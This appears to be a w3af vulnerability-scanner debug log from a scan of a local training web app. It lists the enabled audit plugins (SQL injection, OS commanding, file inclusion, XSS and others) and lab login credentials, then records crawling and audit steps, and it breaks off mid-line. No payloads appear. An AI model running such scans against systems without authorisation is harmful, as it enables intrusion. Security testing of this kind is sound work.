[Wed Feb 12 09:35:53 2020 - information] Enabling redos's dependency server_header [Wed Feb 12 09:35:53 2020 - information] Enabling dav's dependency allowed_methods [Wed Feb 12 09:35:53 2020 - information] Enabling frontpage's dependency frontpage_version [Wed Feb 12 09:35:53 2020 - information] Enabling user_dir's dependency finger_bing [Wed Feb 12 09:35:54 2020 - information] Enabling user_dir's dependency finger_google [Wed Feb 12 09:35:54 2020 - information] Enabling user_dir's dependency finger_pks [Wed Feb 12 09:35:56 2020 - debug] Called w3afCore.start() [Wed Feb 12 09:35:56 2020 - debug] Enabling _dns_cache() [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] audit file_upload, csrf, deserialization, os_commanding, lfi, sqli, blind_sqli, phishing_vector, generic, format_string, websocket_hijacking, shell_shock, memcachei, un_ssl, ldapi, buffer_overflow, redos, global_redirect, xpath, cors_origin, htaccess_methods, dav, ssi, xxe, eval, rosetta_flash, xss, xst, ssl_certificate, preg_replace, mx_injection, response_splitting, rfd, rfi, frontpage [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] infrastructure server_header, allowed_methods, frontpage_version, finger_bing, finger_google, finger_pks [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] grep symfony, file_upload, wsdl_greper, cross_domain_js, http_in_body, expect_ct, svn_users, xss_protection_header, private_ip, motw, retirejs, websockets_links, form_cleartext_password, serialized_object, cache_control, blank_body, path_disclosure, strange_http_codes, credit_cards, code_disclosure, csp, dom_xss, vulners_db, strict_transport_security, keys, form_autocomplete, clamav, html_comments, http_auth_detect, strange_parameters, url_session, dot_net_event_validation, objects, error_500, hash_analysis, lang, click_jacking, feeds, password_profiling, get_emails, meta_tags, error_pages, strange_reason, content_sniffing, user_defined_regex, meta_generator, strange_headers, ssn, oracle, directory_indexing, analyze_cookies [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] output text_file, console [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] output config text_file [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set verbose True [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set output_file output-w3af.txt [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set http_output_file /home/ayush/output-http.txt [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] output config console [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set verbose False [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set use_colors True [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] crawl genexus_xml, wordpress_fingerprint, dot_listing, content_negotiation, robots_txt, archive_dot_org, ria_enumerator, wordnet, user_dir, sitemap_xml, dir_file_bruter, phpinfo, find_dvcs, import_results, payment_webhook_finder, url_fuzzer, urllist_txt, find_backdoors, web_spider, find_captchas, oracle_discovery, wsdl_finder, wordpress_enumerate_users, web_diff, dwsync_xml, pykto, wordpress_fullpathdisclosure, phishtank, digit_sum, open_api, dot_ds_store, ghdb [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] plugins [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] auth detailed [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] auth config detailed [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set username admin [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set password admin [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set username_field username [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set password_field password [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set auth_url http://localhost:9090/login [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set check_url http://localhost:9090/learn/vulnerability/a1_injection [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set check_string Logout [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set data_format %u=%U&%p=%P [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set follow_redirects False [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set method POST [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set url_encode_params True [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] target [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] set target http://localhost:9090/ [ Wed Feb 12 09:35:56 2020 - Enabled plugins ] back [Wed Feb 12 09:36:00 2020 - debug] Starting the scan using w3af version 2019.1.2 / 1910600684 - 04 Nov 2019 11:40 / master [Wed Feb 12 09:36:00 2020 - debug] DNS response from DNS server for domain: localhost [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=1,from_cache=0,grep=1,rtt=0.05,did=QUEcyn4z) [Wed Feb 12 09:36:00 2020 - debug] Increased the worker pool size to 31 (error rate: 0%) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=2,from_cache=0,grep=1,rtt=0.01,did=VFKcLB83) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=3,from_cache=0,grep=1,rtt=0.00,did=yPlx3EOt) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=4,from_cache=0,grep=1,rtt=0.00,did=qpaPVZMn) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=5,from_cache=0,grep=1,rtt=0.00,did=0xH6xUow) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=6,from_cache=0,grep=1,rtt=0.00,did=57JKaCYo) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=7,from_cache=0,grep=1,rtt=0.01,did=6Y1X1tAf) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=8,from_cache=0,grep=1,rtt=0.01,did=k1mZSa9V) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=9,from_cache=0,grep=1,rtt=0.01,did=jyI5Icq5) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=10,from_cache=0,grep=1,rtt=0.01,did=B02qFXhH) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=11,from_cache=0,grep=1,rtt=0.01,did=01hdn6Vp) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=12,from_cache=0,grep=1,rtt=0.01,did=ukbXXM8Z) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=13,from_cache=0,grep=1,rtt=0.00,did=3VOnfzVV) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=14,from_cache=0,grep=1,rtt=0.01,did=LVK7PcMZ) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=15,from_cache=0,grep=1,rtt=0.01,did=AxeOkVPB) [Wed Feb 12 09:36:00 2020 - debug] Updating socket timeout for localhost from 6.00 to 3.00 seconds [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=16,from_cache=0,grep=1,rtt=0.01,did=rRq7qXSv) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=17,from_cache=0,grep=1,rtt=0.00,did=AZpr2lqe) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "200" (id=19,from_cache=0,grep=1,rtt=0.06,did=ueyJauwj) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=20,from_cache=0,grep=1,rtt=0.01,did=5JBtB1df) [Wed Feb 12 09:36:00 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:00 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: xoKAXAQ1) [Wed Feb 12 09:36:00 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=22,from_cache=0,grep=0,rtt=0.01,did=xoKAXAQ1) [Wed Feb 12 09:36:00 2020 - debug] [auth.detailed] User "admin" is NOT logged into the application, the `check_string` was not found in the HTTP response with ID 22. (did: xoKAXAQ1) [Wed Feb 12 09:36:00 2020 - debug] [auth.detailed] Logging into the application with user: admin (did: A8115daB) [Wed Feb 12 09:36:01 2020 - debug] POST http://localhost:9090/login with data: "username=admin&password=admin" returned HTTP code "302" (id=23,from_cache=0,grep=0,rtt=0.30,did=A8115daB) [Wed Feb 12 09:36:01 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: oSGsR7iu) [Wed Feb 12 09:36:01 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=24,from_cache=0,grep=0,rtt=0.03,did=oSGsR7iu) [Wed Feb 12 09:36:01 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: oSGsR7iu) [Wed Feb 12 09:36:01 2020 - debug] Login success for admin [Wed Feb 12 09:36:01 2020 - debug] detailed._login() took 0.38s to run [Wed Feb 12 09:36:01 2020 - debug] Called _setup_audit() [Wed Feb 12 09:36:01 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=25,from_cache=1,grep=1,rtt=0.01,did=A51I4v2f) [Wed Feb 12 09:36:01 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 0, 'reject-seen-url': 0, 'reject-out-of-scope': 0, 'accept': 0} [Wed Feb 12 09:36:01 2020 - debug] The framework has 108 active threads. [Wed Feb 12 09:36:01 2020 - debug] file_upload.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] expect_ct.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] svn_users.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] private_ip.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] motw.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:01 2020 - debug] serialized_object.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] blank_body.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] credit_cards.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] websockets_links.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] csp.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] dom_xss.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] keys.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - error] The ClamAV plugin failed to connect to clamd using the provided unix socket: "/var/run/clamav/clamd.ctl". Please verify your configuration and try again. [Wed Feb 12 09:36:01 2020 - debug] clamav.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] symfony.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] localhost:9090 connection pool stats (free:24 / in_use:0 / max:50 / total:24) [Wed Feb 12 09:36:01 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:01 2020 - debug] GET http://localhost:9090/vCHYS returned HTTP code "404" (id=26,from_cache=0,grep=0,rtt=0.04,did=A51I4v2f) [Wed Feb 12 09:36:01 2020 - debug] Using RLIMIT_AS memory usage limit 2185 MB for new pool process [Wed Feb 12 09:36:01 2020 - debug] Received response for 404 URL http://localhost:9090/vCHYS (id:26, did:A51I4v2f, len:144) [Wed Feb 12 09:36:01 2020 - debug] "http://localhost:9090/" (id:25, code:302, len:28, did:A51I4v2f) is NOT a 404 [known 404 with ID 26 uses 404 code] [Wed Feb 12 09:36:01 2020 - debug] Waited 0.27 seconds in PreventMultipleThreads for event 140101166417168 and normalized path http://localhost:9090/ (did:None) [Wed Feb 12 09:36:01 2020 - debug] Waited 0.27 seconds in PreventMultipleThreads for event 140101166417168 and normalized path http://localhost:9090/ (did:None) [Wed Feb 12 09:36:01 2020 - debug] "http://localhost:9090/" (id:25, code:302, len:28, did:8Tc5vGwY) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:01 2020 - debug] meta_generator.grep(uri="http://localhost:9090/") took 0.28s to run [Wed Feb 12 09:36:01 2020 - debug] "http://localhost:9090/" (id:25, code:302, len:28, did:nJ0Q1waT) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:01 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/") took 0.27s to run [Wed Feb 12 09:36:01 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=27,from_cache=1,grep=1,rtt=0.01,did=vJSwFymc) [Wed Feb 12 09:36:01 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/") took 0.29s to run [Wed Feb 12 09:36:01 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] objects.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] error_500.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] "http://localhost:9090/" (id:25, code:302, len:28, did:8H4c3dp4) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:01 2020 - debug] DNS response from DNS server for domain: raw.githubusercontent.com [Wed Feb 12 09:36:01 2020 - debug] allowed_methods.discover(http://localhost:9090/, did=a6QYZFNE) [Wed Feb 12 09:36:01 2020 - debug] frontpage_version.discover(http://localhost:9090/, did=IAEjTfzV) [Wed Feb 12 09:36:01 2020 - debug] server_header.discover(http://localhost:9090/, did=roFiQxlb) [Wed Feb 12 09:36:01 2020 - debug] finger_bing.discover(http://localhost:9090/, did=mIdkE8qb) [Wed Feb 12 09:36:01 2020 - debug] finger_google.discover(http://localhost:9090/, did=ZKzvI2tq) [Wed Feb 12 09:36:01 2020 - debug] Producer Seed has finished (poison pill received, queue size: 0) [Wed Feb 12 09:36:01 2020 - debug] http_in_body.grep(uri="http://localhost:9090/") took 0.54s to run [Wed Feb 12 09:36:01 2020 - debug] password_profiling.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] click_jacking.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/") took 0.52s to run [Wed Feb 12 09:36:01 2020 - debug] "http://localhost:9090/" (id:25, code:302, len:28, did:HgekYgkV) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:01 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:01 2020 - debug] meta_tags.grep(uri="http://localhost:9090/") took 0.28s to run [Wed Feb 12 09:36:01 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] html_comments.grep(uri="http://localhost:9090/") took 0.53s to run [Wed Feb 12 09:36:01 2020 - debug] strange_reason.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/") took 0.47s to run [Wed Feb 12 09:36:01 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] cache_control.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] strange_headers.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] ssn.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] oracle.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] feeds.grep(uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:01 2020 - debug] url_session.grep(uri="http://localhost:9090/") took 0.32s to run [Wed Feb 12 09:36:01 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/") took 0.32s to run [Wed Feb 12 09:36:01 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/") took 0.55s to run [Wed Feb 12 09:36:01 2020 - debug] finger_pks.discover(http://localhost:9090/, did=Roq60N1e) [Wed Feb 12 09:36:02 2020 - debug] error_pages.grep(uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:02 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/") took 0.06s to run [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=28,from_cache=0,grep=0,rtt=0.03,did=TYIIP5mv) [Wed Feb 12 09:36:02 2020 - debug] genexus_xml.discover(http://localhost:9090/, did=jbOLulUj) [Wed Feb 12 09:36:02 2020 - vulnerability] The URL "http://localhost:9090/" returned an HTTP response without the recommended HTTP header X-Content-Type-Options. This information was found in the request with id 25. [Wed Feb 12 09:36:02 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/") took 0.10s to run [Wed Feb 12 09:36:02 2020 - debug] wordpress_fingerprint.discover(http://localhost:9090/, did=SMyIcAPt) [Wed Feb 12 09:36:02 2020 - debug] [wordpress_fingerprint] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] dot_listing.discover(http://localhost:9090/, did=ftMHsj5T) [Wed Feb 12 09:36:02 2020 - debug] [dot_listing] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] [genexus_xml] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - information] The page is written in: "en". [Wed Feb 12 09:36:02 2020 - debug] content_negotiation.discover(http://localhost:9090/, did=v680J9eZ) [Wed Feb 12 09:36:02 2020 - debug] [content_negotiation] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] content_negotiation.discover(did="v680J9eZ",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/_vti_inf.html returned HTTP code "404" (id=31,from_cache=0,grep=1,rtt=0.17,did=cX51P4Ej) [Wed Feb 12 09:36:02 2020 - debug] file_upload.audit(did="BZHmsKKH", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] file_upload.audit(did="BZHmsKKH",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=29,from_cache=1,grep=1,rtt=0.01,did=sXKKBynF) [Wed Feb 12 09:36:02 2020 - information] The remote HTTP Server omitted the "server" header in its response. This information was found in the request with id 29. [Wed Feb 12 09:36:02 2020 - information] The x-powered-by header for the target HTTP server is "Express". This information was found in the request with id 29. [Wed Feb 12 09:36:02 2020 - debug] server_header.discover(did="roFiQxlb",uri="http://localhost:9090/") took 0.36s to run [Wed Feb 12 09:36:02 2020 - debug] OPTIONS http://localhost:9090/ returned HTTP code "200" (id=30,from_cache=0,grep=1,rtt=0.10,did=Qh8y2P8t) [Wed Feb 12 09:36:02 2020 - debug] csrf.audit(did="Z0g6I5ao", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] csrf.audit(did="Z0g6I5ao",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] deserialization.audit(did="NeWtEPlC", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] deserialization.audit(did="NeWtEPlC",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] robots_txt.discover(http://localhost:9090/, did=T6jTzgzE) [Wed Feb 12 09:36:02 2020 - debug] [robots_txt] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] lang.grep(uri="http://localhost:9090/") took 0.36s to run [Wed Feb 12 09:36:02 2020 - debug] frontpage_version.discover(did="IAEjTfzV",uri="http://localhost:9090/") took 0.44s to run [Wed Feb 12 09:36:02 2020 - debug] symfony.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] file_upload.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] expect_ct.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] svn_users.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] private_ip.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] motw.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] meta_generator.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:02 2020 - debug] serialized_object.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] blank_body.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] os_commanding.audit(did="qkAmxOOy", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:qkAmxOOy) [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] os_commanding.audit(did="qkAmxOOy",uri="http://localhost:9090/") took 0.01s to run [Wed Feb 12 09:36:02 2020 - debug] credit_cards.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] lfi.audit(did="dgOxr40m", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:dgOxr40m) [Wed Feb 12 09:36:02 2020 - debug] websockets_links.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] csp.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] dom_xss.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] archive_dot_org.discover(http://localhost:9090/, did=hNxunmSq) [Wed Feb 12 09:36:02 2020 - debug] [archive_dot_org] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] ria_enumerator.discover(http://localhost:9090/, did=6oxXsePs) [Wed Feb 12 09:36:02 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] keys.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] [ria_enumerator] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] clamav.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] sqli.audit(did="fAgl4mXp", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:fAgl4mXp) [Wed Feb 12 09:36:02 2020 - debug] sqli.audit(did="fAgl4mXp",uri="http://localhost:9090/") took 0.01s to run [Wed Feb 12 09:36:02 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:pRzzmMkb) [Wed Feb 12 09:36:02 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:02 2020 - debug] Raising HTTP error "ARGENTINA" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:pRzzmMkb). [Wed Feb 12 09:36:02 2020 - debug] lfi.audit(did="dgOxr40m",uri="http://localhost:9090/") took 0.11s to run [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/.listing returned HTTP code "404" (id=32,from_cache=0,grep=1,rtt=0.05,did=K1CQsfU1) [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=33,from_cache=0,grep=1,rtt=0.18,did=7rUWRyNX) [Wed Feb 12 09:36:02 2020 - debug] blind_sqli.audit(did="atRJHs5x", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] blind_sqli.audit(did="atRJHs5x",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] phishing_vector.audit(did="ds3mHPYv", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] wordpress_fingerprint.discover(did="SMyIcAPt",uri="http://localhost:9090/") took 0.54s to run [Wed Feb 12 09:36:02 2020 - debug] generic.audit(did="esIQb3Yv", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] dot_listing.discover(did="ftMHsj5T",uri="http://localhost:9090/") took 0.55s to run [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/robots.txt returned HTTP code "404" (id=35,from_cache=0,grep=1,rtt=0.05,did=Z0xwWbSm) [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ds3mHPYv) [Wed Feb 12 09:36:02 2020 - debug] Finished audit.phishing_vector (did=ds3mHPYv) [Wed Feb 12 09:36:02 2020 - debug] phishing_vector.audit(did="ds3mHPYv",uri="http://localhost:9090/") took 0.06s to run [Wed Feb 12 09:36:02 2020 - debug] wordnet.discover(http://localhost:9090/, did=BQboBk2F) [Wed Feb 12 09:36:02 2020 - debug] [wordnet] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] user_dir.discover(http://localhost:9090/, did=O0hJZvrR) [Wed Feb 12 09:36:02 2020 - debug] [user_dir] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] format_string.audit(did="MQqhp8QS", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:MQqhp8QS) [Wed Feb 12 09:36:02 2020 - debug] websocket_hijacking.audit(did="jLi7nfm5", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] websocket_hijacking.audit(did="jLi7nfm5",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] generic.audit(did="esIQb3Yv",uri="http://localhost:9090/") took 0.06s to run [Wed Feb 12 09:36:02 2020 - debug] GET 